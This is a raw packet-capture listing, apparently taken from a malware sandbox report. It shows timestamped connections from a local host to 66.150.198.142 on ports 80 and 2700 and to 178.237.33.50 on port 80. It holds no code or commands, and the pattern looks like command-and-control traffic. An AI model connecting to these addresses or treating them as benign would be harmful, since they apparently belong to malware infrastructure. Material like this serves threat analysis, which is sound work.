                                                          Sep 27, 2024 12:58:44.286704063 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286704063 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286704063 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286765099 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286819935 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286870956 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286895037 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286953926 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287009954 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287044048 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287044048 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287139893 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287198067 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287211895 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287277937 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287333012 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287383080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287383080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287383080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287383080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287436962 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287494898 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287552118 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287564993 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535465956 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535521984 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535537958 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535600901 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535655975 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535713911 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535732031 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535732031 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535732031 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535732031 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535826921 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535878897 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535880089 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535880089 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535922050 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535979986 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536035061 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536046982 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536112070 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536168098 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536223888 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536225080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536225080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536319971 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536377907 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536386967 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536454916 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536510944 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536561012 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536561012 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536561012 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536609888 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536668062 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536726952 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536734104 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536802053 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536856890 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.536900997 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536900997 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536900997 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.536956072 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537013054 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537075043 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537081957 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537148952 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537204981 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537240982 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537240982 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537240982 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537240982 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537313938 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537369967 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537410021 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537410021 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537410021 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537467957 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537524939 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537583113 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537590027 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537657976 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537713051 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537750959 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537750959 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537750959 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537750959 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537822008 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537879944 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.537925005 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.537925005 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.538089037 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.538089991 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.654299021 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.654661894 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.044846058 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.160448074 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:45.160684109 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.166186094 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.290008068 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:45.334038973 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.448945045 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:45.454472065 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.616558075 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:45.616980076 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.740111113 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:45.743278027 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:45.888233900 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:45.942969084 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.009711981 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 12:58:46.057607889 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.061098099 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.099132061 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.176002979 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.176501036 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.185503006 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.199717999 CEST8049785178.237.33.50192.168.11.20
                                                          Sep 27, 2024 12:58:46.199935913 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 12:58:46.200033903 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 12:58:46.306593895 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.349101067 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.394920111 CEST8049785178.237.33.50192.168.11.20
                                                          Sep 27, 2024 12:58:46.395550966 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 12:58:46.438052893 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.464391947 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.473875999 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.603197098 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.634720087 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.635382891 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.757359982 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.757438898 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.757503986 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.757654905 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.757893085 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.757961035 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.758021116 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.758081913 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.758141994 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.758200884 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.758251905 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.758261919 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.758394957 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.758584023 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.873647928 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.873725891 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.873783112 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.873837948 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.873895884 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.873951912 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874010086 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874067068 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874121904 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874176979 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874250889 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874320984 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874377966 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874434948 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874490023 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874558926 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874622107 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874737024 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874742985 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874950886 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.874969959 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.874969959 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.874969959 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.874969959 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.874970913 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.874970913 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.874970913 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.875190020 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.990118027 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990148067 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990159035 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990170956 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990181923 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990223885 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990283012 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990295887 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990307093 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990318060 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990366936 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990406990 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.990422964 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990433931 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990446091 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990488052 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990499020 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990565062 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.990586996 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990588903 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.990715027 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.990818024 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.991269112 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991322994 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991334915 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991345882 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991369963 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991380930 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991391897 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991414070 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991425991 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991436958 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991447926 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991472006 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991483927 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991507053 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.991534948 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991563082 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991575956 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991588116 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991599083 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991612911 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991626024 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991637945 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991650105 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:46.991733074 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:46.991831064 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.105886936 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105901957 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105925083 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105936050 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105947018 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105964899 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105977058 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.105988979 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106031895 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106085062 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106096029 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106106997 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106125116 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106136084 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106278896 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106334925 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106347084 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.106358051 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460400105 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460458040 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460558891 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460588932 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460668087 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.460728884 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460750103 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460767031 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460783005 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460797071 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.460798025 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460814953 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460832119 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460848093 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460864067 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460880041 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460896015 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.460896015 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.460936069 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460984945 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.460994005 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.461000919 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461029053 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461045980 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461077929 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461095095 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461112022 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461117029 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.461137056 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461138964 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.461153030 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461169004 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461185932 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461201906 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461204052 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.461218119 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461256981 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461302996 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461316109 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.461319923 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461352110 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461368084 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461395979 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461399078 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.461411953 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461430073 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461451054 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.461457014 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461473942 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461489916 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461505890 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461522102 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461538076 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461549997 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.461594105 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.461738110 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.462965965 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463057041 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463110924 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463116884 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.463131905 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463181019 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463243008 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463262081 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463289022 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463291883 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.463308096 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463327885 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463359118 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463360071 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.463377953 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463395119 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.463435888 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.463509083 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.463618040 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.465069056 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465138912 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465188026 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465210915 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465229988 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465250969 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465270996 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465287924 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.465357065 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465392113 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465414047 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465442896 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.465442896 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465466022 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465486050 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.465538979 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.465538979 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.465636015 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.467581987 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.467628002 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.467708111 CEST27004978666.150.198.142192.168.11.20
